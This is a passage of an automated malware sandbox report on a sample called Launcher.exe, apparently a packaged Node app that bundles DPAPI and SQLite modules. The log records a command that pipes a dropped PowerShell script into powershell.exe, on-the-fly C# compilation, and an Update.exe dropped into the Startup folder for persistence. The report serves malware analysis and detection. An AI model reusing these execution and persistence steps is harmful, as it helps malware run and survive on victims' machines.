          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Launcher.exeStatic PE information: More than 8191 > 100 exports found
          Source: Launcher.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: Launcher.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: Launcher.exeStatic file information: File size 59619367 > 1048576
          Source: Launcher.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x12aa000
          Source: Launcher.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xfe5c00
          Source: Launcher.exeStatic PE information: More than 200 imports for KERNEL32.dll
          Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: Launcher.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.24e0b2b2d51e47b9dba34c30\node\out\Release\node.pdb\ source: Launcher.exe, 00000000.00000000.1074024698.00007FF65E41B000.00000002.00000001.01000000.00000003.sdmp
          Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.24e0b2b2d51e47b9dba34c30\node\out\Release\node.pdb source: Launcher.exe, 00000000.00000000.1074024698.00007FF65E41B000.00000002.00000001.01000000.00000003.sdmp
          Source: Binary string: D:\a\dpapi\dpapi\build\Release\dpapi.pdb source: Launcher.exe, 00000000.00000003.1398162788.00000174E0553000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394975843.00000089F5C42000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1402314759.00000174E086B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1403784383.00000174E0379000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400003763.00000174E00B6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1398162788.00000174E0508000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1407889165.00000174E06D8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: D:\a\node-sqlite3\node-sqlite3\build\Release\node_sqlite3.pdb source: Launcher.exe, 00000000.00000003.1374116741.00000174E0C11000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1380081872.00000174E0D50000.00000004.00000020.00020000.00000000.sdmp
          Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

          Data Obfuscation

          barindex
          Suspicious command line found
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -"
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline"Jump to behavior
          Source: Launcher.exeStatic PE information: section name: _RDATA
          Source: Update.exe.0.drStatic PE information: section name: _RDATA
          Source: b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442.0.drStatic PE information: section name: _RDATA
          Source: node_sqlite3.node.0.drStatic PE information: section name: _RDATA
          Source: node_sqlite3.node.bak.0.drStatic PE information: section name: _RDATA
          Source: 59b07c111ff3cdb6a2d6d93c23513b9ec89195f53f0a55a3a7769a9f164e6041.0.drStatic PE information: section name: _RDATA
          Source: node.napi.node.0.drStatic PE information: section name: _RDATA
          Source: node.napi.node.bak.0.drStatic PE information: section name: _RDATA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFF8F37474C push ds; retf 29_2_00007FFF8F37474F
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFF8F5D2397 push eax; iretd 29_2_00007FFF8F5D2398
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFF8F5D1D93 pushad ; iretd 29_2_00007FFF8F5D1D94
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFF8F7205FC push ebx; retf 29_2_00007FFF8F720608
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFF8F724A1D pushad ; retf 29_2_00007FFF8F724A39
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFF8F875B79 push ebp; ret 29_2_00007FFF8F875B88
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_00007FFF8F3459E6 push esp; retf 33_2_00007FFF8F3459E9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_00007FFF8F341C7D push eax; iretd 33_2_00007FFF8F341C81
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_00007FFF8F49470E push 8B48FFECh; iretd 33_2_00007FFF8F494714
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_00007FFF8F495D30 push eax; retf 33_2_00007FFF8F495D31
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_00007FFF8F497533 push ebx; iretd 33_2_00007FFF8F49753A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_00007FFF8F4978E3 push ebx; retf 33_2_00007FFF8F49793A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_00007FFF8F710AF0 push esp; retf 33_2_00007FFF8F710AF1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_00007FFF8F716C36 push es; ret 33_2_00007FFF8F716C37
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_00007FFF8F8673DB push ecx; retf 33_2_00007FFF8F8673DC
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_00007FFF8F865BEE push ss; retf 33_2_00007FFF8F865BEF
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_00007FFF8F863CE5 push edi; ret 33_2_00007FFF8F863CE6
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.nodeJump to dropped file
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.nodeJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.dllJump to dropped file
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node.bakJump to dropped file
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg-Ztzknl\59b07c111ff3cdb6a2d6d93c23513b9ec89195f53f0a55a3a7769a9f164e6041Jump to dropped file
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg-Ztzknl\b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442Jump to dropped file
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.node.bakJump to dropped file
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exeJump to dropped file
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg-Ztzknl\b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442Jump to dropped file
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.nodeJump to dropped file
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node.bakJump to dropped file
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg-Ztzknl\59b07c111ff3cdb6a2d6d93c23513b9ec89195f53f0a55a3a7769a9f164e6041Jump to dropped file
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.nodeJump to dropped file
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.node.bakJump to dropped file

          Boot Survival

          barindex
          Drops PE files to the startup folder
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exeJump to dropped file
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exeJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exeJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe\:Zone.Identifier:$DATAJump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
